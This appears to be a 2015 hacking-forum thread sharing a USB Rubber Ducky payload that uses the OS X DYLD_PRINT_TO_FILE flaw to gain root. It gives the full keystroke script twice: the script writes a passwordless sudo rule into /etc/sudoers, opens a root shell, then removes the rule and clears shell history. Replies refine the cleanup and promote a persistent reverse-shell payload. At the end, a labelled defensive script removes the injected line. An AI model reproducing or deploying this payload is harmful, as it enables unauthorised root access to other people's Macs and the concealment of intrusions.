V3sth4cks153 Posted July 25, 2015 (edited)

Hi everyone! I just saw this on thehackernews.com, and I thought I'd make a Rubber Ducky payload for it. This payload exploits the DYLD_PRINT_TO_FILE privilege escalation in order to get root on a Mac. This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between. The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.

I've successfully tested this on an Early 2013 MacBook Pro Retina 15'' running OS X 10.10.3 Yosemite.

NOTE: Since the payload uses the username of the victim, I had to make it delete a bit more than the exact length of the added text in the sudoers file (the exploit command adds this to the sudoers file, located at /etc/sudoers: "username ALL=(ALL) NOPASSWD:ALL"). This shouldn't be a problem because the last few lines are commented out. Also, having a super, super long username, like 30-ish characters (which I don't even know if it's possible), can be a problem.

If ever you need it, here is the default sudoers file for Mac OS X 10.10 Yosemite.

Hope you like it!

********************* USE THIS PAYLOAD AT YOUR OWN RISK! *********************

Here is the code:

REM Author: V3sth4cks153
REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup
REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between.
REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
REM
REM ********************* USE THIS AT YOUR OWN RISK *********************
REM
REM --------------- OPEN TERMINAL ---------------
GUI SPACE
DELAY 100
STRING Terminal
DELAY 500
ENTER
DELAY 1000
REM --------------- GO TO HOME DIRECTORY ---------------
STRING cd
ENTER
DELAY 100
REM --------------- ESCALATE PRIVS ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
REM *
REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE *********************
REM *
REM --------------- CLEANUP ---------------
STRING cd
ENTER
STRING visudo -f /etc/sudoers
ENTER
DOWNARROW
REPEAT 50
RIGHTARROW
REPEAT 40
STRING i
RIGHTARROW
BACKSPACE
REPEAT 35
ESC
STRING :w
ENTER
STRING :x
ENTER
STRING history -c
ENTER
DELAY 100
STRING exit
ENTER
STRING history -c
ENTER
GUI q

Edited July 25, 2015 by V3sth4cks153
Xcellerator Posted July 26, 2015

Nice! The only thing I'd change is your cleanup operation. Depending on how long someone's username is, it could overwrite and erase other parts of the sudoers file. I'd suggest using nano, then CTRL-K to cut the whole line out instead of worrying about removing a certain number of chars. Other than that, it's a nice implementation. Let's see how long it takes Apple to push out a patch?
V3sth4cks153 Posted July 26, 2015 Author (edited)

Thanks! I'm glad you like it! You're right about the cleanup operation. The only problem I had is you can't edit the sudoers file with any editor other than visudo, which is basically VIM. I just found out today that by using the ":$d" command in visudo you can delete the last line. It is better in every way as the payload is then smaller, so faster!

I'm currently working on an application of this exploit, which uploads a text file containing the IP of the victim, and then changes the root password to anything you want so that you can ssh/sftp to the victim! I'll post it on the forums when it's done. DONE!

As for Apple, as it's said in the article, they generally don't patch current versions of their OS, but include a fix in the next version instead. Which I hope they won't do this time, since this is far more dangerous than just making your iPhone reboot!

Here is the modified code (it's also on my GitHub):

REM Author: V3sth4cks153
REM Title: DYLD_PRINT_TO_FILE Privilege Escalation + cleanup
REM This payload exploits the DYLD_PRINT_TO_FILE Privilege Escalation in order to get root on a Mac.
REM This is just the privilege escalation and the cleanup parts. You can put anything you want root to do in between.
REM The cleanup part resets the sudoers file, clears the command history and then quits the Terminal app.
REM
REM ********************* USE THIS AT YOUR OWN RISK *********************
REM
REM --------------- OPEN TERMINAL ---------------
GUI SPACE
DELAY 100
STRING Terminal
DELAY 500
ENTER
DELAY 1000
REM --------------- GO TO HOME DIRECTORY ---------------
STRING cd
ENTER
DELAY 100
REM --------------- ESCALATE PRIVS ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
REM *
REM ********************* YOU CAN PUT ANYTHING YOU WANT ROOT TO DO HERE *********************
REM *
REM --------------- CLEANUP ---------------
STRING cd
ENTER
STRING visudo -f /etc/sudoers
ENTER
DELAY 500
STRING :$d
ENTER
STRING :w
ENTER
STRING :x
ENTER
STRING history -c
ENTER
DELAY 100
STRING exit
ENTER
STRING history -c
ENTER
GUI q

Edited July 26, 2015 by V3sth4cks153
Xcellerator Posted July 27, 2015

Oh, I see what you mean! That is much nicer than using nano. (I've never had any trouble using nano to edit /etc/sudoers as I sudo'd it first?) I've never really been able to get along with vi.

Apple are still likely to be pretty slow at patching this. If it was a serious RCE then we might see a different reaction, but in the real world, people are so precious of their Macs that it's gonna be so hard to get the physical access to a machine that you need to exploit this. (That's Apple's justification, anyway!)
V3sth4cks153 Posted July 27, 2015 Author (edited)

It is indeed! I personally also prefer nano, but then I saw this text in the sudoers file, which convinced me there must be a reason why Apple says to use visudo.

# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
# Failure to use 'visudo' may result in syntax or file permission errors
# that prevent sudo from running.
#

I also think Apple will likely be slow at patching this. But by searching for "DYLD_PRINT_TO_FILE post module" on Google, I found this, which pretty much means that if an attacker already has user-level control of your Mac, he can use this module to take full control of the machine, even without physical access! But since it's already been 5 days since this was discovered, I find it really unlikely that Apple will release a patch.

Edited July 27, 2015 by V3sth4cks153
Matto Posted August 9, 2015

This vulnerability is great! I've just created a payload for a persistent reverse bash in OS X using it: https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/

About visudo: I've been testing a little, and it seems that nothing happens if you directly edit /etc/sudoers, so what my script does is, once the payload has been executed, just delete the last line of the file like this:

REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq' | ed /etc/sudoers
ENTER
DELAY 200

I tested this on my own Mac and it works OK. It's way simpler and faster than using visudo. Hope it helps!
V3sth4cks153 Posted August 10, 2015 Author (edited)

Hi. That's really cool! It's even better than the ":$d" command in visudo! Being a bit of a bash beginner, I didn't even think about not opening the file in the first place... I'll test it on my computer when I'm back home from holidays.

Edited August 10, 2015 by V3sth4cks153
Matto Posted August 10, 2015

Hope it works for you :) I've tested on a couple of Macs by now, and everything works as expected.
V3sth4cks153 Posted August 10, 2015 Author

I hope so! It would be so cool! But is there a way to disable it, though? If so, could you give me the command please? Thanks
Matto Posted August 10, 2015

To disable it you just need to run:

sudo crontab -e

on the victim's computer. This will open a text editor and you just have to remove only the last line, which is the one that the script created. Then save and you're done.
V3sth4cks153 Posted August 10, 2015 Author

OK, great! Thanks! I'll give you feedback as soon as I get a chance to test it.
V3sth4cks153 Posted August 28, 2015 Author

The vulnerability has been patched in 10.10.5!
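Every cleanup variant in this thread (the visudo ":$d" keystrokes and the ed one-liner) deletes whatever the last line of /etc/sudoers happens to be, which is only correct if nothing else was appended after the payload ran and the file still ends where the default one does. The script below is an added example, not code from the thread or from any of its authors. It audits a sudoers-format file for accounts granted passwordless ALL, removes exactly the line the payload writes ("<user> ALL=(ALL) NOPASSWD:ALL") rather than the last line, rewrites the file in place so its 0440 root:wheel mode survives, and offers a syntax check through `visudo -c -f` when visudo is installed. Assumptions: the injected line has exactly the form quoted in the first post, the sample sudoers is constructed here for the demo, and the 10.10.5 cutoff in `affected_version` is taken from the final post of the thread; versions outside 10.10.x are simply reported as not covered.

```shell
#!/bin/sh
# Added example (not from the thread): audit /etc/sudoers for the line the
# DYLD_PRINT_TO_FILE payload appends, remove exactly that line, and check the
# OS X version against the 10.10.5 fix reported at the end of the thread.

# Print, one per line, every non-comment account granted "ALL=(ALL) NOPASSWD:ALL"
# (with or without a space after the colon) in the sudoers file "$1".
nopasswd_users() {
    awk '$1 !~ /^#/ && $2 == "ALL=(ALL)" &&
         ($3 == "NOPASSWD:ALL" || ($3 == "NOPASSWD:" && $4 == "ALL")) {print $1}' "$1"
}

# Delete the "<user> ALL=(ALL) NOPASSWD:ALL" line for account "$2" from file "$1".
# Returns 0 if at least one line was removed, 1 if nothing matched, 2 on a
# refused account name.  The file is rewritten through cat so owner and mode
# (0440 root:wheel on a real /etc/sudoers) are preserved; run it as root there.
remove_nopasswd_line() {
    file="$1"; user="$2"
    case "$user" in
        *[!A-Za-z0-9._-]*|"") echo "refusing unusual account name: $user" >&2; return 2 ;;
    esac
    esc=$(printf '%s' "$user" | sed 's/\./\\./g')   # "." is the only regex meta allowed above
    before=$(grep -c '' "$file")
    tmp="$file.tmp.$$"
    sed "/^${esc}[[:space:]]\{1,\}ALL=(ALL)[[:space:]]\{1,\}NOPASSWD:[[:space:]]*ALL[[:space:]]*$/d" \
        "$file" > "$tmp" && cat "$tmp" > "$file"
    rm -f "$tmp"
    after=$(grep -c '' "$file")
    [ "$after" -lt "$before" ]
}

# Syntax-check a sudoers file with visudo when it is available (a broken
# sudoers locks everyone out of sudo, which is why the file header insists on visudo).
check_sudoers() {
    if command -v visudo >/dev/null 2>&1; then
        visudo -c -f "$1"
    else
        echo "visudo not found; syntax of $1 not checked" >&2
    fi
}

# Return 0 for a 10.10.x release earlier than 10.10.5 (the fix version named in the
# thread), 1 otherwise.  Other major releases are not covered by the thread, so
# they also return 1; a missing patch number is treated as 0 (assumption).
affected_version() {
    ver="$1"
    major=${ver%%.*}; rest=${ver#*.}
    [ "$rest" = "$ver" ] && rest=0
    minor=${rest%%.*}; patch=${rest#*.}
    [ "$patch" = "$rest" ] && patch=0
    [ "$major" = 10 ] && [ "$minor" = 10 ] && [ "$patch" -lt 5 ]
}

# Constructed sample sudoers: a default-style file whose trailing lines are
# comments, followed by the line the payload appends for user "bob".
write_sample_sudoers() {
    cat > "$1" <<'EOF'
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
#
Defaults env_reset
root ALL=(ALL) ALL
%admin ALL=(ALL) ALL
deploy ALL=(ALL) NOPASSWD: ALL
# %wheel ALL=(ALL) NOPASSWD: ALL
bob ALL=(ALL) NOPASSWD:ALL
EOF
}

# Demo on the constructed file (never on the live /etc/sudoers).
demo_dir=$(mktemp -d)
write_sample_sudoers "$demo_dir/sudoers"
echo "passwordless before: $(nopasswd_users "$demo_dir/sudoers" | tr '\n' ' ')"
remove_nopasswd_line "$demo_dir/sudoers" bob
echo "passwordless after:  $(nopasswd_users "$demo_dir/sudoers" | tr '\n' ' ')"
echo "10.10.3 affected: $(affected_version 10.10.3 && echo yes || echo no)"
rm -rf "$demo_dir"
```

On a real machine, run `nopasswd_users /etc/sudoers` first to see what is actually there, then `remove_nopasswd_line /etc/sudoers "$(whoami)"` as root followed by `check_sudoers /etc/sudoers`; the legitimate `deploy` entry in the sample is left alone, which the blind last-line deletion in the thread cannot guarantee.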